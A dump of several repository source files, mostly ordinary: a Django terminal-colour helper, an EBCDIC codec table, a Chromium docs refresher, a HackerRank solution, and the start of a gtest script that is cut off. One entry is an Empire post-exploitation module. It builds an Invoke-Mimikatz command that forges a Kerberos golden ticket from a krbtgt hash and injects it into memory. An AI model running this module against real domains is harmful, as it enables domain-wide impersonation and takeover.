repo_name stringlengths 5 100 | path stringlengths 4 294 | copies stringclasses 990 values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15 values |
|---|---|---|---|---|---|
loic/django | django/utils/termcolors.py | 87 | 7302 | """
termcolors.py
"""
from django.utils import six
color_names = ('black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white')
foreground = {color_names[x]: '3%s' % x for x in range(8)}
background = {color_names[x]: '4%s' % x for x in range(8)}
RESET = '0'
opt_dict = {'bold': '1', 'underscore': '4', 'blink': '5', 'reverse': '7', 'conceal': '8'}
def colorize(text='', opts=(), **kwargs):
"""
Returns your text, enclosed in ANSI graphics codes.
Depends on the keyword arguments 'fg' and 'bg', and the contents of
the opts tuple/list.
Returns the RESET code if no parameters are given.
Valid colors:
'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white'
Valid options:
'bold'
'underscore'
'blink'
'reverse'
'conceal'
'noreset' - string will not be auto-terminated with the RESET code
Examples:
colorize('hello', fg='red', bg='blue', opts=('blink',))
colorize()
colorize('goodbye', opts=('underscore',))
print(colorize('first line', fg='red', opts=('noreset',)))
print('this should be red too')
print(colorize('and so should this'))
print('this should not be red')
"""
code_list = []
if text == '' and len(opts) == 1 and opts[0] == 'reset':
return '\x1b[%sm' % RESET
for k, v in six.iteritems(kwargs):
if k == 'fg':
code_list.append(foreground[v])
elif k == 'bg':
code_list.append(background[v])
for o in opts:
if o in opt_dict:
code_list.append(opt_dict[o])
if 'noreset' not in opts:
text = '%s\x1b[%sm' % (text or '', RESET)
return '%s%s' % (('\x1b[%sm' % ';'.join(code_list)), text or '')
def make_style(opts=(), **kwargs):
"""
Returns a function with default parameters for colorize()
Example:
bold_red = make_style(opts=('bold',), fg='red')
print(bold_red('hello'))
KEYWORD = make_style(fg='yellow')
COMMENT = make_style(fg='blue', opts=('bold',))
"""
return lambda text: colorize(text, opts, **kwargs)
NOCOLOR_PALETTE = 'nocolor'
DARK_PALETTE = 'dark'
LIGHT_PALETTE = 'light'
PALETTES = {
NOCOLOR_PALETTE: {
'ERROR': {},
'SUCCESS': {},
'WARNING': {},
'NOTICE': {},
'SQL_FIELD': {},
'SQL_COLTYPE': {},
'SQL_KEYWORD': {},
'SQL_TABLE': {},
'HTTP_INFO': {},
'HTTP_SUCCESS': {},
'HTTP_REDIRECT': {},
'HTTP_NOT_MODIFIED': {},
'HTTP_BAD_REQUEST': {},
'HTTP_NOT_FOUND': {},
'HTTP_SERVER_ERROR': {},
'MIGRATE_HEADING': {},
'MIGRATE_LABEL': {},
},
DARK_PALETTE: {
'ERROR': {'fg': 'red', 'opts': ('bold',)},
'SUCCESS': {'fg': 'green', 'opts': ('bold',)},
'WARNING': {'fg': 'yellow', 'opts': ('bold',)},
'NOTICE': {'fg': 'red'},
'SQL_FIELD': {'fg': 'green', 'opts': ('bold',)},
'SQL_COLTYPE': {'fg': 'green'},
'SQL_KEYWORD': {'fg': 'yellow'},
'SQL_TABLE': {'opts': ('bold',)},
'HTTP_INFO': {'opts': ('bold',)},
'HTTP_SUCCESS': {},
'HTTP_REDIRECT': {'fg': 'green'},
'HTTP_NOT_MODIFIED': {'fg': 'cyan'},
'HTTP_BAD_REQUEST': {'fg': 'red', 'opts': ('bold',)},
'HTTP_NOT_FOUND': {'fg': 'yellow'},
'HTTP_SERVER_ERROR': {'fg': 'magenta', 'opts': ('bold',)},
'MIGRATE_HEADING': {'fg': 'cyan', 'opts': ('bold',)},
'MIGRATE_LABEL': {'opts': ('bold',)},
},
LIGHT_PALETTE: {
'ERROR': {'fg': 'red', 'opts': ('bold',)},
'SUCCESS': {'fg': 'green', 'opts': ('bold',)},
'WARNING': {'fg': 'yellow', 'opts': ('bold',)},
'NOTICE': {'fg': 'red'},
'SQL_FIELD': {'fg': 'green', 'opts': ('bold',)},
'SQL_COLTYPE': {'fg': 'green'},
'SQL_KEYWORD': {'fg': 'blue'},
'SQL_TABLE': {'opts': ('bold',)},
'HTTP_INFO': {'opts': ('bold',)},
'HTTP_SUCCESS': {},
'HTTP_REDIRECT': {'fg': 'green', 'opts': ('bold',)},
'HTTP_NOT_MODIFIED': {'fg': 'green'},
'HTTP_BAD_REQUEST': {'fg': 'red', 'opts': ('bold',)},
'HTTP_NOT_FOUND': {'fg': 'red'},
'HTTP_SERVER_ERROR': {'fg': 'magenta', 'opts': ('bold',)},
'MIGRATE_HEADING': {'fg': 'cyan', 'opts': ('bold',)},
'MIGRATE_LABEL': {'opts': ('bold',)},
}
}
DEFAULT_PALETTE = DARK_PALETTE
def parse_color_setting(config_string):
"""Parse a DJANGO_COLORS environment variable to produce the system palette
The general form of a palette definition is:
"palette;role=fg;role=fg/bg;role=fg,option,option;role=fg/bg,option,option"
where:
palette is a named palette; one of 'light', 'dark', or 'nocolor'.
role is a named style used by Django
fg is a background color.
bg is a background color.
option is a display options.
Specifying a named palette is the same as manually specifying the individual
definitions for each role. Any individual definitions following the palette
definition will augment the base palette definition.
Valid roles:
'error', 'notice', 'sql_field', 'sql_coltype', 'sql_keyword', 'sql_table',
'http_info', 'http_success', 'http_redirect', 'http_bad_request',
'http_not_found', 'http_server_error'
Valid colors:
'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white'
Valid options:
'bold', 'underscore', 'blink', 'reverse', 'conceal'
"""
if not config_string:
return PALETTES[DEFAULT_PALETTE]
# Split the color configuration into parts
parts = config_string.lower().split(';')
palette = PALETTES[NOCOLOR_PALETTE].copy()
for part in parts:
if part in PALETTES:
# A default palette has been specified
palette.update(PALETTES[part])
elif '=' in part:
# Process a palette defining string
definition = {}
# Break the definition into the role,
# plus the list of specific instructions.
# The role must be in upper case
role, instructions = part.split('=')
role = role.upper()
styles = instructions.split(',')
styles.reverse()
# The first instruction can contain a slash
# to break apart fg/bg.
colors = styles.pop().split('/')
colors.reverse()
fg = colors.pop()
if fg in color_names:
definition['fg'] = fg
if colors and colors[-1] in color_names:
definition['bg'] = colors[-1]
# All remaining instructions are options
opts = tuple(s for s in styles if s in opt_dict.keys())
if opts:
definition['opts'] = opts
# The nocolor palette has all available roles.
# Use that palette as the basis for determining
# if the role is valid.
if role in PALETTES[NOCOLOR_PALETTE] and definition:
palette[role] = definition
# If there are no colors specified, return the empty palette.
if palette == PALETTES[NOCOLOR_PALETTE]:
return None
return palette
| bsd-3-clause |
maohongyuan/kbengine | kbe/res/scripts/common/Lib/encodings/cp500.py | 266 | 13121 | """ Python Character Mapping Codec cp500 generated from 'MAPPINGS/VENDORS/MICSFT/EBCDIC/CP500.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='cp500',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
'\x00' # 0x00 -> NULL
'\x01' # 0x01 -> START OF HEADING
'\x02' # 0x02 -> START OF TEXT
'\x03' # 0x03 -> END OF TEXT
'\x9c' # 0x04 -> CONTROL
'\t' # 0x05 -> HORIZONTAL TABULATION
'\x86' # 0x06 -> CONTROL
'\x7f' # 0x07 -> DELETE
'\x97' # 0x08 -> CONTROL
'\x8d' # 0x09 -> CONTROL
'\x8e' # 0x0A -> CONTROL
'\x0b' # 0x0B -> VERTICAL TABULATION
'\x0c' # 0x0C -> FORM FEED
'\r' # 0x0D -> CARRIAGE RETURN
'\x0e' # 0x0E -> SHIFT OUT
'\x0f' # 0x0F -> SHIFT IN
'\x10' # 0x10 -> DATA LINK ESCAPE
'\x11' # 0x11 -> DEVICE CONTROL ONE
'\x12' # 0x12 -> DEVICE CONTROL TWO
'\x13' # 0x13 -> DEVICE CONTROL THREE
'\x9d' # 0x14 -> CONTROL
'\x85' # 0x15 -> CONTROL
'\x08' # 0x16 -> BACKSPACE
'\x87' # 0x17 -> CONTROL
'\x18' # 0x18 -> CANCEL
'\x19' # 0x19 -> END OF MEDIUM
'\x92' # 0x1A -> CONTROL
'\x8f' # 0x1B -> CONTROL
'\x1c' # 0x1C -> FILE SEPARATOR
'\x1d' # 0x1D -> GROUP SEPARATOR
'\x1e' # 0x1E -> RECORD SEPARATOR
'\x1f' # 0x1F -> UNIT SEPARATOR
'\x80' # 0x20 -> CONTROL
'\x81' # 0x21 -> CONTROL
'\x82' # 0x22 -> CONTROL
'\x83' # 0x23 -> CONTROL
'\x84' # 0x24 -> CONTROL
'\n' # 0x25 -> LINE FEED
'\x17' # 0x26 -> END OF TRANSMISSION BLOCK
'\x1b' # 0x27 -> ESCAPE
'\x88' # 0x28 -> CONTROL
'\x89' # 0x29 -> CONTROL
'\x8a' # 0x2A -> CONTROL
'\x8b' # 0x2B -> CONTROL
'\x8c' # 0x2C -> CONTROL
'\x05' # 0x2D -> ENQUIRY
'\x06' # 0x2E -> ACKNOWLEDGE
'\x07' # 0x2F -> BELL
'\x90' # 0x30 -> CONTROL
'\x91' # 0x31 -> CONTROL
'\x16' # 0x32 -> SYNCHRONOUS IDLE
'\x93' # 0x33 -> CONTROL
'\x94' # 0x34 -> CONTROL
'\x95' # 0x35 -> CONTROL
'\x96' # 0x36 -> CONTROL
'\x04' # 0x37 -> END OF TRANSMISSION
'\x98' # 0x38 -> CONTROL
'\x99' # 0x39 -> CONTROL
'\x9a' # 0x3A -> CONTROL
'\x9b' # 0x3B -> CONTROL
'\x14' # 0x3C -> DEVICE CONTROL FOUR
'\x15' # 0x3D -> NEGATIVE ACKNOWLEDGE
'\x9e' # 0x3E -> CONTROL
'\x1a' # 0x3F -> SUBSTITUTE
' ' # 0x40 -> SPACE
'\xa0' # 0x41 -> NO-BREAK SPACE
'\xe2' # 0x42 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
'\xe4' # 0x43 -> LATIN SMALL LETTER A WITH DIAERESIS
'\xe0' # 0x44 -> LATIN SMALL LETTER A WITH GRAVE
'\xe1' # 0x45 -> LATIN SMALL LETTER A WITH ACUTE
'\xe3' # 0x46 -> LATIN SMALL LETTER A WITH TILDE
'\xe5' # 0x47 -> LATIN SMALL LETTER A WITH RING ABOVE
'\xe7' # 0x48 -> LATIN SMALL LETTER C WITH CEDILLA
'\xf1' # 0x49 -> LATIN SMALL LETTER N WITH TILDE
'[' # 0x4A -> LEFT SQUARE BRACKET
'.' # 0x4B -> FULL STOP
'<' # 0x4C -> LESS-THAN SIGN
'(' # 0x4D -> LEFT PARENTHESIS
'+' # 0x4E -> PLUS SIGN
'!' # 0x4F -> EXCLAMATION MARK
'&' # 0x50 -> AMPERSAND
'\xe9' # 0x51 -> LATIN SMALL LETTER E WITH ACUTE
'\xea' # 0x52 -> LATIN SMALL LETTER E WITH CIRCUMFLEX
'\xeb' # 0x53 -> LATIN SMALL LETTER E WITH DIAERESIS
'\xe8' # 0x54 -> LATIN SMALL LETTER E WITH GRAVE
'\xed' # 0x55 -> LATIN SMALL LETTER I WITH ACUTE
'\xee' # 0x56 -> LATIN SMALL LETTER I WITH CIRCUMFLEX
'\xef' # 0x57 -> LATIN SMALL LETTER I WITH DIAERESIS
'\xec' # 0x58 -> LATIN SMALL LETTER I WITH GRAVE
'\xdf' # 0x59 -> LATIN SMALL LETTER SHARP S (GERMAN)
']' # 0x5A -> RIGHT SQUARE BRACKET
'$' # 0x5B -> DOLLAR SIGN
'*' # 0x5C -> ASTERISK
')' # 0x5D -> RIGHT PARENTHESIS
';' # 0x5E -> SEMICOLON
'^' # 0x5F -> CIRCUMFLEX ACCENT
'-' # 0x60 -> HYPHEN-MINUS
'/' # 0x61 -> SOLIDUS
'\xc2' # 0x62 -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX
'\xc4' # 0x63 -> LATIN CAPITAL LETTER A WITH DIAERESIS
'\xc0' # 0x64 -> LATIN CAPITAL LETTER A WITH GRAVE
'\xc1' # 0x65 -> LATIN CAPITAL LETTER A WITH ACUTE
'\xc3' # 0x66 -> LATIN CAPITAL LETTER A WITH TILDE
'\xc5' # 0x67 -> LATIN CAPITAL LETTER A WITH RING ABOVE
'\xc7' # 0x68 -> LATIN CAPITAL LETTER C WITH CEDILLA
'\xd1' # 0x69 -> LATIN CAPITAL LETTER N WITH TILDE
'\xa6' # 0x6A -> BROKEN BAR
',' # 0x6B -> COMMA
'%' # 0x6C -> PERCENT SIGN
'_' # 0x6D -> LOW LINE
'>' # 0x6E -> GREATER-THAN SIGN
'?' # 0x6F -> QUESTION MARK
'\xf8' # 0x70 -> LATIN SMALL LETTER O WITH STROKE
'\xc9' # 0x71 -> LATIN CAPITAL LETTER E WITH ACUTE
'\xca' # 0x72 -> LATIN CAPITAL LETTER E WITH CIRCUMFLEX
'\xcb' # 0x73 -> LATIN CAPITAL LETTER E WITH DIAERESIS
'\xc8' # 0x74 -> LATIN CAPITAL LETTER E WITH GRAVE
'\xcd' # 0x75 -> LATIN CAPITAL LETTER I WITH ACUTE
'\xce' # 0x76 -> LATIN CAPITAL LETTER I WITH CIRCUMFLEX
'\xcf' # 0x77 -> LATIN CAPITAL LETTER I WITH DIAERESIS
'\xcc' # 0x78 -> LATIN CAPITAL LETTER I WITH GRAVE
'`' # 0x79 -> GRAVE ACCENT
':' # 0x7A -> COLON
'#' # 0x7B -> NUMBER SIGN
'@' # 0x7C -> COMMERCIAL AT
"'" # 0x7D -> APOSTROPHE
'=' # 0x7E -> EQUALS SIGN
'"' # 0x7F -> QUOTATION MARK
'\xd8' # 0x80 -> LATIN CAPITAL LETTER O WITH STROKE
'a' # 0x81 -> LATIN SMALL LETTER A
'b' # 0x82 -> LATIN SMALL LETTER B
'c' # 0x83 -> LATIN SMALL LETTER C
'd' # 0x84 -> LATIN SMALL LETTER D
'e' # 0x85 -> LATIN SMALL LETTER E
'f' # 0x86 -> LATIN SMALL LETTER F
'g' # 0x87 -> LATIN SMALL LETTER G
'h' # 0x88 -> LATIN SMALL LETTER H
'i' # 0x89 -> LATIN SMALL LETTER I
'\xab' # 0x8A -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
'\xbb' # 0x8B -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
'\xf0' # 0x8C -> LATIN SMALL LETTER ETH (ICELANDIC)
'\xfd' # 0x8D -> LATIN SMALL LETTER Y WITH ACUTE
'\xfe' # 0x8E -> LATIN SMALL LETTER THORN (ICELANDIC)
'\xb1' # 0x8F -> PLUS-MINUS SIGN
'\xb0' # 0x90 -> DEGREE SIGN
'j' # 0x91 -> LATIN SMALL LETTER J
'k' # 0x92 -> LATIN SMALL LETTER K
'l' # 0x93 -> LATIN SMALL LETTER L
'm' # 0x94 -> LATIN SMALL LETTER M
'n' # 0x95 -> LATIN SMALL LETTER N
'o' # 0x96 -> LATIN SMALL LETTER O
'p' # 0x97 -> LATIN SMALL LETTER P
'q' # 0x98 -> LATIN SMALL LETTER Q
'r' # 0x99 -> LATIN SMALL LETTER R
'\xaa' # 0x9A -> FEMININE ORDINAL INDICATOR
'\xba' # 0x9B -> MASCULINE ORDINAL INDICATOR
'\xe6' # 0x9C -> LATIN SMALL LIGATURE AE
'\xb8' # 0x9D -> CEDILLA
'\xc6' # 0x9E -> LATIN CAPITAL LIGATURE AE
'\xa4' # 0x9F -> CURRENCY SIGN
'\xb5' # 0xA0 -> MICRO SIGN
'~' # 0xA1 -> TILDE
's' # 0xA2 -> LATIN SMALL LETTER S
't' # 0xA3 -> LATIN SMALL LETTER T
'u' # 0xA4 -> LATIN SMALL LETTER U
'v' # 0xA5 -> LATIN SMALL LETTER V
'w' # 0xA6 -> LATIN SMALL LETTER W
'x' # 0xA7 -> LATIN SMALL LETTER X
'y' # 0xA8 -> LATIN SMALL LETTER Y
'z' # 0xA9 -> LATIN SMALL LETTER Z
'\xa1' # 0xAA -> INVERTED EXCLAMATION MARK
'\xbf' # 0xAB -> INVERTED QUESTION MARK
'\xd0' # 0xAC -> LATIN CAPITAL LETTER ETH (ICELANDIC)
'\xdd' # 0xAD -> LATIN CAPITAL LETTER Y WITH ACUTE
'\xde' # 0xAE -> LATIN CAPITAL LETTER THORN (ICELANDIC)
'\xae' # 0xAF -> REGISTERED SIGN
'\xa2' # 0xB0 -> CENT SIGN
'\xa3' # 0xB1 -> POUND SIGN
'\xa5' # 0xB2 -> YEN SIGN
'\xb7' # 0xB3 -> MIDDLE DOT
'\xa9' # 0xB4 -> COPYRIGHT SIGN
'\xa7' # 0xB5 -> SECTION SIGN
'\xb6' # 0xB6 -> PILCROW SIGN
'\xbc' # 0xB7 -> VULGAR FRACTION ONE QUARTER
'\xbd' # 0xB8 -> VULGAR FRACTION ONE HALF
'\xbe' # 0xB9 -> VULGAR FRACTION THREE QUARTERS
'\xac' # 0xBA -> NOT SIGN
'|' # 0xBB -> VERTICAL LINE
'\xaf' # 0xBC -> MACRON
'\xa8' # 0xBD -> DIAERESIS
'\xb4' # 0xBE -> ACUTE ACCENT
'\xd7' # 0xBF -> MULTIPLICATION SIGN
'{' # 0xC0 -> LEFT CURLY BRACKET
'A' # 0xC1 -> LATIN CAPITAL LETTER A
'B' # 0xC2 -> LATIN CAPITAL LETTER B
'C' # 0xC3 -> LATIN CAPITAL LETTER C
'D' # 0xC4 -> LATIN CAPITAL LETTER D
'E' # 0xC5 -> LATIN CAPITAL LETTER E
'F' # 0xC6 -> LATIN CAPITAL LETTER F
'G' # 0xC7 -> LATIN CAPITAL LETTER G
'H' # 0xC8 -> LATIN CAPITAL LETTER H
'I' # 0xC9 -> LATIN CAPITAL LETTER I
'\xad' # 0xCA -> SOFT HYPHEN
'\xf4' # 0xCB -> LATIN SMALL LETTER O WITH CIRCUMFLEX
'\xf6' # 0xCC -> LATIN SMALL LETTER O WITH DIAERESIS
'\xf2' # 0xCD -> LATIN SMALL LETTER O WITH GRAVE
'\xf3' # 0xCE -> LATIN SMALL LETTER O WITH ACUTE
'\xf5' # 0xCF -> LATIN SMALL LETTER O WITH TILDE
'}' # 0xD0 -> RIGHT CURLY BRACKET
'J' # 0xD1 -> LATIN CAPITAL LETTER J
'K' # 0xD2 -> LATIN CAPITAL LETTER K
'L' # 0xD3 -> LATIN CAPITAL LETTER L
'M' # 0xD4 -> LATIN CAPITAL LETTER M
'N' # 0xD5 -> LATIN CAPITAL LETTER N
'O' # 0xD6 -> LATIN CAPITAL LETTER O
'P' # 0xD7 -> LATIN CAPITAL LETTER P
'Q' # 0xD8 -> LATIN CAPITAL LETTER Q
'R' # 0xD9 -> LATIN CAPITAL LETTER R
'\xb9' # 0xDA -> SUPERSCRIPT ONE
'\xfb' # 0xDB -> LATIN SMALL LETTER U WITH CIRCUMFLEX
'\xfc' # 0xDC -> LATIN SMALL LETTER U WITH DIAERESIS
'\xf9' # 0xDD -> LATIN SMALL LETTER U WITH GRAVE
'\xfa' # 0xDE -> LATIN SMALL LETTER U WITH ACUTE
'\xff' # 0xDF -> LATIN SMALL LETTER Y WITH DIAERESIS
'\\' # 0xE0 -> REVERSE SOLIDUS
'\xf7' # 0xE1 -> DIVISION SIGN
'S' # 0xE2 -> LATIN CAPITAL LETTER S
'T' # 0xE3 -> LATIN CAPITAL LETTER T
'U' # 0xE4 -> LATIN CAPITAL LETTER U
'V' # 0xE5 -> LATIN CAPITAL LETTER V
'W' # 0xE6 -> LATIN CAPITAL LETTER W
'X' # 0xE7 -> LATIN CAPITAL LETTER X
'Y' # 0xE8 -> LATIN CAPITAL LETTER Y
'Z' # 0xE9 -> LATIN CAPITAL LETTER Z
'\xb2' # 0xEA -> SUPERSCRIPT TWO
'\xd4' # 0xEB -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
'\xd6' # 0xEC -> LATIN CAPITAL LETTER O WITH DIAERESIS
'\xd2' # 0xED -> LATIN CAPITAL LETTER O WITH GRAVE
'\xd3' # 0xEE -> LATIN CAPITAL LETTER O WITH ACUTE
'\xd5' # 0xEF -> LATIN CAPITAL LETTER O WITH TILDE
'0' # 0xF0 -> DIGIT ZERO
'1' # 0xF1 -> DIGIT ONE
'2' # 0xF2 -> DIGIT TWO
'3' # 0xF3 -> DIGIT THREE
'4' # 0xF4 -> DIGIT FOUR
'5' # 0xF5 -> DIGIT FIVE
'6' # 0xF6 -> DIGIT SIX
'7' # 0xF7 -> DIGIT SEVEN
'8' # 0xF8 -> DIGIT EIGHT
'9' # 0xF9 -> DIGIT NINE
'\xb3' # 0xFA -> SUPERSCRIPT THREE
'\xdb' # 0xFB -> LATIN CAPITAL LETTER U WITH CIRCUMFLEX
'\xdc' # 0xFC -> LATIN CAPITAL LETTER U WITH DIAERESIS
'\xd9' # 0xFD -> LATIN CAPITAL LETTER U WITH GRAVE
'\xda' # 0xFE -> LATIN CAPITAL LETTER U WITH ACUTE
'\x9f' # 0xFF -> CONTROL
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
| lgpl-3.0 |
liorvh/Empire | lib/modules/credentials/mimikatz/golden_ticket.py | 9 | 5052 | from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Mimikatz Golden Ticket',
'Author': ['@JosephBialek', '@gentilkiwi'],
'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
"to generate a golden ticket and inject it into memory."),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'MinPSVersion' : '2',
'Comments': [
'http://clymb3r.wordpress.com/',
'http://blog.gentilkiwi.com',
"https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos"
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'CredID' : {
'Description' : 'CredID from the store to use for ticket creation.',
'Required' : False,
'Value' : ''
},
'user' : {
'Description' : 'Username to impersonate.',
'Required' : True,
'Value' : ''
},
'domain' : {
'Description' : 'The fully qualified domain name.',
'Required' : False,
'Value' : ''
},
'sid' : {
'Description' : 'The SID of the specified domain.',
'Required' : False,
'Value' : ''
},
'id' : {
'Description' : 'id to impersonate, defaults to 500.',
'Required' : False,
'Value' : ''
},
'krbtgt' : {
'Description' : 'krbtgt NTLM hash for the specified domain',
'Required' : False,
'Value' : ''
},
'groups' : {
'Description' : 'Optional comma separated group IDs for the ticket.',
'Required' : False,
'Value' : ''
},
'endin' : {
'Description' : 'Lifetime of the ticket (in minutes). Default to 10 years.',
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# if a credential ID is specified, try to parse
credID = self.options["CredID"]['Value']
if credID != "":
if not self.mainMenu.credentials.is_credential_valid(credID):
print helpers.color("[!] CredID is invalid!")
return ""
(credID, credType, domainName, userName, password, host, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]
if userName != "krbtgt":
print helpers.color("[!] A krbtgt account must be used")
return ""
if domainName != "":
self.options["domain"]['Value'] = domainName
if sid != "":
self.options["sid"]['Value'] = sid
if password != "":
self.options["krbtgt"]['Value'] = password
if self.options["krbtgt"]['Value'] == "":
print helpers.color("[!] krbtgt hash not specified")
# build the golden ticket command
script += "Invoke-Mimikatz -Command '\"kerberos::golden"
for option,values in self.options.iteritems():
if option.lower() != "agent" and option.lower() != "credid":
if values['Value'] and values['Value'] != '':
script += " /" + str(option) + ":" + str(values['Value'])
script += " /ptt\"'"
return script
| bsd-3-clause |
ltilve/chromium | chrome/common/extensions/docs/server2/render_refresher.py | 41 | 3514 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import posixpath
from custom_logger import CustomLogger
from extensions_paths import EXAMPLES
from file_system_util import CreateURLsFromPaths
from future import Future
from render_servlet import RenderServlet
from special_paths import SITE_VERIFICATION_FILE
from timer import Timer
_SUPPORTED_TARGETS = {
'examples': (EXAMPLES, 'extensions/examples'),
}
_log = CustomLogger('render_refresher')
class _SingletonRenderServletDelegate(RenderServlet.Delegate):
def __init__(self, server_instance):
self._server_instance = server_instance
def CreateServerInstance(self):
return self._server_instance
def _RequestEachItem(title, items, request_callback):
'''Runs a task |request_callback| named |title| for each item in |items|.
|request_callback| must take an item and return a servlet response.
Returns true if every item was successfully run, false if any return a
non-200 response or raise an exception.
'''
_log.info('%s: starting', title)
success_count, failure_count = 0, 0
timer = Timer()
try:
for i, item in enumerate(items):
def error_message(detail):
return '%s: error rendering %s (%s of %s): %s' % (
title, item, i + 1, len(items), detail)
try:
response = request_callback(item)
if response.status == 200:
success_count += 1
else:
_log.error(error_message('response status %s' % response.status))
failure_count += 1
except Exception as e:
_log.error(error_message(traceback.format_exc()))
failure_count += 1
if IsDeadlineExceededError(e): raise
finally:
_log.info('%s: rendered %s of %s with %s failures in %s',
title, success_count, len(items), failure_count,
timer.Stop().FormatElapsed())
return success_count == len(items)
class RenderRefresher(object):
'''Used to refresh any set of renderable resources. Currently only supports
assets related to extensions examples.'''
def __init__(self, server_instance, request):
self._server_instance = server_instance
self._request = request
def GetRefreshPaths(self):
return _SUPPORTED_TARGETS.keys()
def Refresh(self, path):
def render(path):
request = Request(path, self._request.host, self._request.headers)
delegate = _SingletonRenderServletDelegate(self._server_instance)
return RenderServlet(request, delegate).Get()
def request_files_in_dir(path, prefix='', strip_ext=None):
'''Requests every file found under |path| in this host file system, with
a request prefix of |prefix|. |strip_ext| is an optional list of file
extensions that should be stripped from paths before requesting.
'''
def maybe_strip_ext(name):
if name == SITE_VERIFICATION_FILE or not strip_ext:
return name
base, ext = posixpath.splitext(name)
return base if ext in strip_ext else name
files = [maybe_strip_ext(name)
for name, _ in CreateURLsFromPaths(master_fs, path, prefix)]
return _RequestEachItem(path, files, render)
# Only support examples for now.
if path not in _SUPPORTED_TARGETS:
return Future(callback=lambda: False)
dir = _SUPPORTED_TARGETS[path][0]
prefix = _SUPPORTED_TARGETS[path][1]
return request_files_in_dir(dir, prefix=prefix)
| bsd-3-clause |
ee08b397/HackerRankAlgorithms | Building a List.py | 1 | 1417 | """
Problem Statement
Chan has decided to make a list of all possible combinations of letters of a given string S. If there are two strings
with the same set of characters, print the lexicographically smallest arrangement of the two strings.
abc acb cab bac bca
all the above strings' lexicographically smallest string is abc.
Each character in the string S is unique. Your task is to print the entire list of Chan's in lexicographic order.
for string abc, the list in lexicographic order is given below
a ab abc ac b bc c
"""
__author__ = 'Danyang'
class Solution(object):
def solve(self, cipher):
"""
main solution function
:param cipher: the cipher
"""
s = cipher
s = "".join(sorted(list(s)))
result = []
self.dfs(s, "", result)
return "\n".join(result[1:])
def dfs(self, seq, cur, result):
result.append(cur)
if seq:
for i in xrange(len(seq)):
self.dfs(seq[i+1:], cur+seq[i], result)
if __name__=="__main__":
import sys
f = open("1.in", "r")
# f = sys.stdin
testcases = int(f.readline().strip())
for t in xrange(testcases):
# construct cipher
N = int(f.readline().strip())
cipher = f.readline().strip()
# solve
s = "%s\n"%(Solution().solve(cipher))
print s, | apache-2.0 |
smartdevice475/sdl_core_346_wince | src/3rd_party-static/gmock-1.7.0/gtest/xcode/Scripts/versiongenerate.py | 3088 | 4536 | #!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""A script to prepare version informtion for use the gtest Info.plist file.
This script extracts the version information from the configure.ac file and
